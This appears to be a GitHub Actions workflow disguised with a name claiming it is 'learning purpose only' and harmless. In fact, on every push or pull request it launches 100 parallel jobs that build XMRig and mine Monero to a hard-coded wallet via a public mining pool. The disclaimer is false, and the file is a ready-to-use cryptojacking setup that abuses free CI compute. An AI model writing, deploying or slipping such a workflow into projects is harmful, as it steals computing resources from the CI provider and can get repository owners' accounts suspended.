name: Truly Learning Purpose Only. Not actually mode enabled. No danger to any machines. works as other tasks

on:
  push:
    branches: [master]  # Trigger on push to the master branch
  pull_request:
    branches: [master]  # Trigger on pull request to the master branch
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    strategy:
      matrix:
        worker_id: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100]
      fail-fast: false  # Continue running all matrix jobs even if one fails

    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Install dependencies and build XMRig
        run: |
          sudo apt update
          sudo apt-get install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make

      - name: Run XMRig
        run: |
          cd xmrig/build
          ./xmrig -o pool.supportxmr.com:443-u 49ucRzKeG7XZsdKfCswGEHQstBXpTgKZjFiCrNsqdQnvXBcYb8rDnAqEo8X3FQeve7QaRQqshEPCagDxnL2LVbXPCFb2qQu -k --tls --rig-id workflow-${{ matrix.worker_id }}
